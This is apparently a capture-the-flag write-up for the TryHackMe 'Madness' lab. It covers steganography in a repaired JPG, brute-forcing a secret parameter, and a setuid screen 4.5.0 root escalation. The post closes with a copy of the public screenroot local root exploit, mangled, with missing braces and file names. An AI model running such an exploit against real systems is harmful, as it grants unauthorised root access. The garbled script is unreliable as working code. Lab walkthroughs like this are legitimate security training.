Will you be consumed by Madness?

This is a easy rated box. Let’s begin.


nmap says we’ve got 22 (SSH) and 80 (HTTP) only.


To start with, this appears to be simply the Apache default page. But hidden away is a comment:

<img src="thm.jpg" class="floating_element"/>
<!-- They will never find me-->

We can grab the file with wget:

kali:/opt/tryhackme/madness# wget http://madness.thm/thm.jpg

The file is corrupted, but we can repair it with hexeditor by replacing the first 12 bytes with FF D8 FF E0 00 10 4A 46 49 46 00 01 to reveal a hidden directory:



The page says:

Welcome! I have been expecting you! To obtain my identity you need to guess my secret!

So now we can do: http://madness.thm/th1s_1s_h1dd3n/?secret=0

And the source code reveals the ‘secret’ value is between 0 and 99. With Burp Turbo Intruder we can establish that it is 73, and we get the message:

Urgh, you got it right! But I won’t tell you who I am! y2RPJ4QaPF!B

This string is the used as a passphrase for the repaired JPG from earlier to extract some hidden text:

Fine you found the password!
Here’s a username
I didn’t say I would make it easy for you!

This is ROT13 encoding for the word joker.

However, we can’t SSH in as joker with y2RPJ4QaPF!B as the password, because the password is something else.

So, what is it?

Yep, I had to check a writeup. You go to the room page on the THM website, download a picture from there and run steghide with no password to get the hidden file; the password is *axA&GF8dP.

Can I just say, that’s some real bullshit. You might have a different view and that’s fine, but I wasn’t impressed.


Run linpeas, find out ‘screen’ is a PE vector. Quick google, find an exploit, run it, root. F*** this box.


# setuid screen v4.5.0 local root exploit
# abuses overwriting to get root.
# bug:
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    printf("[+] done!\n");
gcc -fPIC -shared -ldl -o /tmp/ /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    execvp("/bin/sh", NULL, NULL);
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ file..."
cd /etc
umask 000 # because
/bin/screen-4.5.0 -D -m -L echo -ne  "\x0a/tmp/" # newline needed
echo "[+] Triggering..."
/bin/screen-4.5.0 -ls # screen itself is setuid, so...